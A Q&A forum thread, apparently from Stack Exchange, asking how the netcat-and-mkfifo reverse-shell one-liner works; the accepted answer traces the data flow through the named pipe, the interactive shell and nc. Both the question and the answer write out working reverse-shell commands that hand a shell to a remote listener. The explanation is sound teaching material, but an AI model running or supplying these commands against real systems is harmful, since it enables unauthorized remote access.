# How does this command work? (reverse shell)

Tags: command-line, networking, bash, pipe, netcat

There was a simple way to connect two systems and getting a shell using **nc** command as below.

- Machine A to listen

  ```
  nc -nlvp 4444
  ```
- Machine B to connect

  ```
  nc 192.168.4.4 4444 -e /bin/bash
  ```

However, the **-e** option is no more, The [man](http://manpages.ubuntu.com/manpages/cosmic/man1/nc_openbsd.1.html) pages recommends following as below to execute commands

- Machine A to listen

  ```
  nc -nlvp 4444
  ```
- Machine B to connect

  ```
  rm /tmp/f
  mkfifo /tmp/f
  cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.4.4 4444 > /tmp/f
  ```

I do know the concepts behind `mkfifo` (named pipes) and how redirection and piping works. But it still confuses me.

Answer (score 7, accepted):

Let's think in standard streams, `stdin` and `stderr` for a minute.

```
nc 192.168.4.4 4444 >/tmp/f
```

The `stdout` stream of `nc` gets duplicated to `/tmp/f` fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From `/bin/sh -i 2>&1`. As far as `nc` is concerned, it just has to send that data back to the other machine.

Well, what does `/bin/sh -i` do ? It invokes interactive shell - the one where you type commands and print output to `stdout`. The `user@host` prompt is typically (if not always) printed to `stderr`, but we need to send that to remote machine, hence `2>&1` redirection is applied to send the prompt via pipe. Well, we can't use `stdout` to print the output - the shell has to send that to `nc 192.168.4.4 4444` to be sent over the network. We can't read `stdin` either - `cat /tmp/f` will be using that to print whatever command is issued from the machine A in your example.  Piping commands to the interactive shell isn't anything particularly special - when `stdin` is rewired an application isn't aware of it unless it is actively checking.

```
$ echo 'df' | sh -i
$ Filesystem     1K-blocks     Used Available Use% Mounted on
udev             4000944        0   4000944   0% /dev
tmpfs             805348     1400    803948   1% /run
/dev/sda1       28717732 25907684   1328188  96% /
tmpfs            4026732    97496   3929236   3% /dev/shm
tmpfs               5120        4      5116   1% /run/lock
tmpfs            4026732        0   4026732   0% /sys/fs/cgroup
/dev/sdb1      115247656 99204832  10165476  91% /mnt/ubuntu
tmpfs             805344       32    805312   1% /run/user/1000
$ 
sh: 1: Cannot set tty process group (No such process)
```

So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to `nc`. The commands sent from remote to local shell are written by `nc` to the fifo. And so the loop goes on and on. The text-based data-flow diagram below also summarizes the same information

```
                             input data
                                  ||  /\
             (in via network)     \/  || (back via network `/bin/sh` via nc`)

cat /tmp/f  == > /bin/sh -i 2>&1 ==> nc 192.168.4.4 4444 ==>  /tmp/f ==||
  /\                                                                   ||
  ||                                                                   \/
  ======================================================================
```

On the tangent note, notice that making a 3-command pipeline like that allows us to spawn these commands in one go (although [the order is not guaranteed](https://unix.stackexchange.com/a/37597/85039)) in a much less convoluted way. If we were to do this manualy and have all as foreground processes, `nc` would have to be started first to listen in one shell, `cat` in the other shell, `sh` in the third.  For the time it takes us to prepare them, it would block either read or write from the named fifo file `/tmp/f`, and it would also raise a question of how to sent output from `cat` to `/bin/sh` and from `/bin/sh` to `nc` , which may also add more named pipes.  Using a pipe does three [`fork()`](https://man7.org/linux/man-pages/man2/fork.2.html) calls, and three [`exec()`](https://www.man7.org/linux/man-pages/man3/exec.3.html) calls in one shell, and allows us to make them all talk via file descriptors; regardless of the order in which they may start - this is much faster and less convoluted, though not the easiest to understand without knowing how pipes,file descriptors, and the commands behave.

**IMPORTANT NOTE**: traditional `nc` as protocol doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use `ssh`. The `ssh` protocol was designed specifically for that purpose. If you do intend to use secure protocol use [openssl](https://serverfault.com/a/102039/363611) or `ncat`.